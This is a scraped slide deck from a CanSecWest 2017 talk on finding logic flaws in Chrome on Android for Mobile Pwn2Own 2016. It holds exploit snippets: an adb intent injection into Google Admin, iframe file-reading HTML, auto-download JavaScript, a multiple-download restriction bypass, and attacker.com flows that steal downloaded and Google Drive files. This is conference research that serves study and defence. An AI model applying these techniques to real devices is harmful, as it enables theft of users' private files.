logic bug hunting in chrome on android
play

Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017 - PowerPoint PPT Presentation

Feb 25, 2024 •217 likes •963 views

Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017 Agenda Fuzzing and memory corruptions Introduction to logic flaws General approach to hunting logic bugs Application in Mobile Pwn2Own 2016 Exploit improvement

  1. Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017

  2. Agenda • Fuzzing and memory corruptions • Introduction to logic flaws • General approach to hunting logic bugs • Application in Mobile Pwn2Own 2016 • Exploit improvement

  3. Tindroductions

  4. Fuzzing and Pwn2Own • Fuzzing has become mainstream • AFL, LibFuzzer, Radamsa, Honggfuzz, etc. • It’s almost too easy… • People find and kill bugs they rarely understand… • Increasing likelihood of duplicates • libstagefright, Chrome, etc. • Code changes • Improved exploit mitigations

  5. Android Mitigations • More and better security mechanisms • Improved rights management, SELinux, TrustZone • ASLR, DEP, PIE, RELRO, PartitionAlloc, Improved GC • Significant increase in exploit development time • Multiple bugs are usually chained together • PoC isn’t enough for the competition • We can’t afford spending too much time on Pwn2Own

  6. Memory Corruptions vs. Logic Flaws • Memory corruptions • Programming errors • Memory safety violations • Architecture-dependent • General mitigations • Logic flaws • Design vulnerabilities • Intended behaviour • Architecture-agnostic • Lack of general mitigation mechanisms

  7. We Love Logic Bugs • Equally beautiful and hilarious vectors • Basic tools • Actual exploits might be somewhat convoluted Q: How many bugs do you have in your chain? A: We abuse one and a half features. Q: What tool did you use to find that bug? A: Notepad.

  8. It’s not just us…

  9. It’s not just us…

  10. It’s not just us…

  11. It’s not just us…

  12. Identifying Logic Flaws • I don’t know what I’m doing… • Lack of one-size-fits-all methodology • Thou shalt know thy target • Less known or obscure features • Trust boundaries and boundary violations • Threat modelling

  13. Mobile Pwn2Own 2016

  14. Mobile Pwn2Own 2016

  15. Mobile Pwn2Own 2016 ✘

  16. Mobile Pwn2Own 2016 Category Phone Price (USD) Apple iPhone $50,000 Obtaining Sensitive Google Nexus $50,000 Information Samsung Galaxy $35,000 Apple iPhone $125,000 Install Rogue Google Nexus $100,000 Application Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000 “All entries must compromise the devices by browsing to web content […] or by viewing/receiving an MMS/SMS message .” http://zerodayinitiative.com/MobilePwn2Own2016Rules.html

  17. Where do we start? • Ruling out SMS/MMS • Limited to media rendering bugs • Chrome • Core components • URI handlers • IPC to other applications

  18. Google Admin • Case study from 2015

  19. Google Admin <activity android:name="com.google.android.apps. enterprise.cpanel.activities.ResetPinActivity"> <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:host="localhost" android:scheme="http"/> </intent-filter> </activity> AndroidManifest.xml

  20. Google Admin public void onCreate(Bundle arg3) { this .c = this .getIntent().getExtras().getString("setup_url"); this .b.loadUrl( this .c); // ... } ResetPinActivity.java

  21. Google Admin • Attacking with malware adb shell am start \ – d http://localhost/foo \ -e setup_url file:////data/data/com.malware/file.html

  22. Google Admin Chrome < HTML >< BODY > < IFRAME SRC="file:///tmp/foo.html" id="foo" onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);"> </ IFRAME > </ BODY ></ HTML > file:///tmp/foo.html Uncaught DOMException: Blocked a frame with origin "null" from accessing a cross-origin frame.

  23. Google Admin Chrome on Android API 17 < HTML >< BODY > < IFRAME SRC="file:///sdcard/foo.html" id="foo" onLoad="console.log(document.getelementById('foo').contentDocument.body.innerHTML);"> </ IFRAME > </ BODY ></ HTML > file:///sdcard/foo.html Yep, that’s fine!

  24. Google Admin • Malicious app creates a world readable file, e.g. foo.html • foo.html will load an iframe with src = “foo.html” after a small delay • Sends a URL for foo.html to Google Admin via IPC • Change foo.html to be a symbolic link pointing to a file in the Google Admin’s sandbox • Post file contents back to a web server

  25. Same-Origin Policy • Chrome for Android vs. Chrome • Different SOP • Custom Android schemes • Worth investigating…

  26. SOP in Chrome for Android HTTP / HTTPS Scheme, domain and port number must match. Full file path for origin until API 23. Starting with API 24, all origins are FILE now NULL. CONTENT Scheme, domain and port number must match. DATA All origins are NULL.

  27. Jumping Origins Destination Scheme HTTP / HTTPS FILE CONTENT DATA ✓ ✘ ✓ ✓ HTTP / HTTPS Source Scheme ✓ ✓ ✓ ✓ FILE ✓ ✘ ✓ ✓ CONTENT ✓ ✘ ✓ ✓ DATA

  28. Android Content Providers • Implement data repositories • Exportable for external access • Declared in AndroidManifest.xml • Read and write access control • Content URIs • Combination of ‘authority’ and ‘path’ • content://<authority><path> • content://downloads/my_downloads/45 • What about SOP?

  29. Android Download Manager • System service that handles long-running HTTP downloads • Back to SOP… content://downloads/my_downloads/45 content://downloads/my_downloads/46 content://downloads/my_downloads/102

  30. Automatic File Downloads • Thank you, HTML5! • Confirmed to work in Chrome • <a href =“foo.html” download > • <a href =“foo.html” download =“bar.html"> • Zero user interaction • Link click using JavaScript • Perfect for Pwn2Own

  31. Automatic File Downloads < a id='foo' href='evil.html' download> link </ a > < script > document.getElementById('foo').click(); </ script >

  32. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html

  33. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html https://attacker.com/index.html

  34. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html GET /evil.html evil.html (download) evil.html (download)

  35. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) https://attacker.com/index.html

  36. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html

  37. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html content://downloads/my_downloads/54

  38. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html GET my_downloads/53 secrets.pdf secrets.pdf

  39. Mobile Pwn2Own 2016 Category Phone Price (USD) Apple iPhone $50,000 Obtaining Sensitive Google Nexus $50,000 Information Samsung Galaxy $35,000 Apple iPhone $125,000 Install Rogue Application Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000

  40. Exploit Enhancement • Downloading arbitrary files • User sessions < a id='foo' href='https://drive.google.com/my_drive.html' download> link </ a > < script > document.getElementById('foo').click(); </ script >

  41. Multiple File Downloads • Multiple automatic downloads from the same page are forbidden

  42. Multiple File Downloads Restriction Bypass • However… < meta http-equiv="refresh" content="0; url=page2.html" /> page1.html < script > window.history.back(); </ script > page2.html

  43. Exploit #2 – Stealing Google Drive Files Attacker’s Android Victim’s Google Drive Web Server Download Manager Browser Web Server evil.html (download) GET my_downloads/54 evil.html

  44. Exploit #2 – Stealing Google Drive Files Attacker’s Android Victim’s Google Drive Web Server Download Manager Browser Web Server evil.html (download) GET my_downloads/54 evil.html content://downloads/my_downloads/54

  45. Exploit #2 – Stealing Google Drive Files Attacker’s Android Victim’s Google Drive Web Server Download Manager Browser Web Server evil.html (download) GET my_downloads/54 evil.html GET /my_drive.html my_drive.html (download)

Recommend

Logic Bug Hunting in Chrome on Android Infiltrate 17 April, 2017 Agenda Fuzzing and memory

Logic Bug Hunting in Chrome on Android Infiltrate 17 April, 2017 Agenda Fuzzing and memory

Logic Bug Hunting in Chrome on Android Infiltrate 17 April, 2017 Agenda Fuzzing and memory corruptions Introduction to logic flaws General approach to hunting logic bugs Application in Mobile Pwn2Own 2016 Exploit improvement

1.07k views • 52 slides
Running Android in a Container How the play store runs on Chrome OS How Android Runs On Chrome

Running Android in a Container How the play store runs on Chrome OS How Android Runs On Chrome

Running Android in a Container How the play store runs on Chrome OS How Android Runs On Chrome OS Chrome Graphics Buffer (Prime FD) Android IPC IPC Chrome IPC Binder System Bridge Bridge (*/init*) Input Events network config, GL,

296 views • 10 slides
a C h r o m e b o o k t o o Maksim Lin Freelance Android &amp; Chrome App Developer

a C h r o m e b o o k t o o Maksim Lin Freelance Android &amp; Chrome App Developer

Oh the things you could do if you had a C h r o m e b o o k t o o Maksim Lin Freelance Android &amp; Chrome App Developer www.manichord.com So what are Chromebooks, ChromeOS And Chrome (Packaged) Apps? Chromebooks (and

612 views • 28 slides
5. Note two things, the box now says, Added to Chrome. Notice the Blue box with an S (for Snagit)

5. Note two things, the box now says, Added to Chrome. Notice the Blue box with an S (for Snagit)

Snagit for Google Chrome: Instructions IMPORTANT. You will need to be in Chrome and Not on Chrome for this app to work. (go to Chrome first, then go to whatever site you plan to screencast.) 1. Open Chrome, Type in Snagit for Chrome.

184 views • 3 slides
Stetho: using Dev Tools for native app debugging Maksim Lin Freelance Android Developer

Stetho: using Dev Tools for native app debugging Maksim Lin Freelance Android Developer

Stetho: using Dev Tools for native app debugging Maksim Lin Freelance Android Developer www.manichord.com Chrome Dev Tools ( aka F12 ) ? What is Stetho ? Android library project from Facebook Implements Chrome DevTools Protocol

500 views • 14 slides
Samba and Chrome OS the Start of a beautiful Friendship Lutz Justen ljusten@google.com sambaXP,

Samba and Chrome OS the Start of a beautiful Friendship Lutz Justen ljusten@google.com sambaXP,

Samba and Chrome OS the Start of a beautiful Friendship Lutz Justen ljusten@google.com sambaXP, Gttingen June 06, 2018 Topics Chrome OS and Chromebooks Active Directory Integration How it works, management, Android apps, certificates,

774 views • 45 slides
Polished Droids: Bringing Android Apps to Chromebooks Maksim Lin Freelance Android Developer

Polished Droids: Bringing Android Apps to Chromebooks Maksim Lin Freelance Android Developer

Polished Droids: Bringing Android Apps to Chromebooks Maksim Lin Freelance Android Developer www.manichord.com Chromebooks ? Background Freelance Android and AOSP dev ~ 5 yrs Use and Chromebooks ~ 4yrs Wrote Git client Chrome

339 views • 31 slides
Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting

Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting

Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting PLC Global Footprint 2 2009 Corporate Highlights Completed three acquisitions 47.3m Sale of Hunting Energy France 11.1m Year end

857 views • 37 slides
Revisiting the Chrome Extension Permissions Model Pranav Prakash, Chester Leung 1 Courtesy of

Revisiting the Chrome Extension Permissions Model Pranav Prakash, Chester Leung 1 Courtesy of

Revisiting the Chrome Extension Permissions Model Pranav Prakash, Chester Leung 1 Courtesy of W3Counter 2 Courtesy of W3Counter 3 Chrome has ~190,000 Google Chrome extensions released 2010 2020 2008 2019 Chrome adds Chrome removes

1.07k views • 105 slides
Waterfowl Hunting for Beginners by John Martsh R-3 Program Manager Hunting Techniques: Spot and

Waterfowl Hunting for Beginners by John Martsh R-3 Program Manager Hunting Techniques: Spot and

Waterfowl Hunting for Beginners by John Martsh R-3 Program Manager Hunting Techniques: Spot and Stalk Hunting Techniques: Decoying Hunting Techniques: Pass Shooting Gauge Sizes Choke extracted from muzzle Choke lengths and wall diameters

783 views • 29 slides
Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine About Me Natalie

Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine About Me Natalie

Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine About Me Natalie Silvanovich AKA natashenka Project Zero member Previously did mobile security on Android and BlackBerry ECMAScript enthusiast

893 views • 39 slides
Developers Google Maps Android API v2 Make your Android app pop with Google Maps Android API v2

Developers Google Maps Android API v2 Make your Android app pop with Google Maps Android API v2

Developers Google Maps Android API v2 Make your Android app pop with Google Maps Android API v2 Anthony Morris Jan-Felix Schmakeit Tech Lead, Android Maps API Android Developer Relations Code, Slides, Worksheet: http://goo.gl/MfY67 Welcome!

687 views • 49 slides
A Safe and Stateless Platform - Introduction to Google Chrome OS Security model Google Chrome

A Safe and Stateless Platform - Introduction to Google Chrome OS Security model Google Chrome

A Safe and Stateless Platform - Introduction to Google Chrome OS Security model Google Chrome OS Speed Security - Verified boot Security - Reboot to recover Security for the internet age Current Operating Systems Chrome OS Apps have

424 views • 8 slides
Hex Chrome Exposures from Hex Chrome Exposures from Metal Cladding Work in a Boiler O t b

Hex Chrome Exposures from Hex Chrome Exposures from Metal Cladding Work in a Boiler O t b

Hex Chrome Exposures from Hex Chrome Exposures from Metal Cladding Work in a Boiler O t b October 2012 2012 Luminant Corporate Safety David Friedman, CIH, MSPH, ARM Background Information Situation occurred at a lignite plant in Central

495 views • 25 slides
Introduction to Android Development What is Android? Android is the customizable, easy to

Introduction to Android Development What is Android? Android is the customizable, easy to

Introduction to Android Development What is Android? Android is the customizable, easy to use operating system that powers more than a billion devices across the globe - from phones and tablets to watches, TV, cars and more to come.

464 views • 21 slides
CS619 Android 101 BENCE CSERNA Android: Manifest example Android: Manifest &lt;manifest

CS619 Android 101 BENCE CSERNA Android: Manifest example Android: Manifest &lt;manifest

Project #1: Color Guess Game CS619 Android 101 BENCE CSERNA Android: Manifest example Android: Manifest &lt;manifest xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot; package=&quot;net.cserna.bence.colorguess

201 views • 3 slides
What other Android APIs may be useful for ubicomp? Speaking to Android Ref: Professional Android 4

What other Android APIs may be useful for ubicomp? Speaking to Android Ref: Professional Android 4

What other Android APIs may be useful for ubicomp? Speaking to Android Ref: Professional Android 4 Development, Meier, Ch 11, pg 437 Speech recognition: Accept inputs as speech (instead of typing) e.g. dragon dictate app? Note: Google

333 views • 16 slides
Introduction Presenter: Jienan Liu Network, Intelligence &amp; security Lab What is Chrome

Introduction Presenter: Jienan Liu Network, Intelligence &amp; security Lab What is Chrome

Chrome Extension Introduction Presenter: Jienan Liu Network, Intelligence &amp; security Lab What is Chrome Extension Extension Small software programs that can modify and enhance the functionality of the Chrome browser. Written

576 views • 18 slides
THE LEGALITY OF TIGER FARMING, TROPHY HUNTING AND CANNED HUNTING UNDER INTERNATIONAL LAW Cecil

THE LEGALITY OF TIGER FARMING, TROPHY HUNTING AND CANNED HUNTING UNDER INTERNATIONAL LAW Cecil

THE LEGALITY OF TIGER FARMING, TROPHY HUNTING AND CANNED HUNTING UNDER INTERNATIONAL LAW Cecil the Lion, Hwange National Park, Zimbabwe, 2013 Yann Prisner-Levyne WILD FAUNA= NATURAL RESOURCES UNDER INTERNATIONAL LAW Principle of permanent

400 views • 21 slides
Indigenous Hunting Rights in British Columbia By: Liam Robertson Broken Down Firearm

Indigenous Hunting Rights in British Columbia By: Liam Robertson Broken Down Firearm

Indigenous Hunting Rights in British Columbia By: Liam Robertson Broken Down Firearm Licensing (Briefly) Hunting on Traditional Territory Hunting off Traditional Territory Applying for a FWID and BCEID Metis Hunting in BC

377 views • 13 slides
Android AsyncTask AsyncTask Android AsyncTask is an abstract class provided by Android

Android AsyncTask AsyncTask Android AsyncTask is an abstract class provided by Android

Android AsyncTask AsyncTask Android AsyncTask is an abstract class provided by Android which gives us the liberty to perform heavy tasks in the background and keep the UI thread light thus making the application more responsive. Basic

240 views • 5 slides
Android Android Application Development - Ashwin Agenda Android Platform Overview

Android Android Application Development - Ashwin Agenda Android Platform Overview

Android Android Application Development - Ashwin Agenda Android Platform Overview Installation Building Blocks Application Development Development Tools Source walk through Introduction to Android Open software

978 views • 49 slides
CS371m - Mobile Computing Android Overview and Android Development Environment What is Android?

CS371m - Mobile Computing Android Overview and Android Development Environment What is Android?

CS371m - Mobile Computing Android Overview and Android Development Environment What is Android? A software stack for mobile devices that includes An operating system Middleware Key Applications Uses Linux to provide core

1.49k views • 70 slides
CS378 - Mobile Computing Android Overview and Android Development Environment What is Android?

CS378 - Mobile Computing Android Overview and Android Development Environment What is Android?

CS378 - Mobile Computing Android Overview and Android Development Environment What is Android? A software stack for mobile devices that includes An operating system Middleware Key Applications Uses Linux to provide core

583 views • 31 slides

More recommend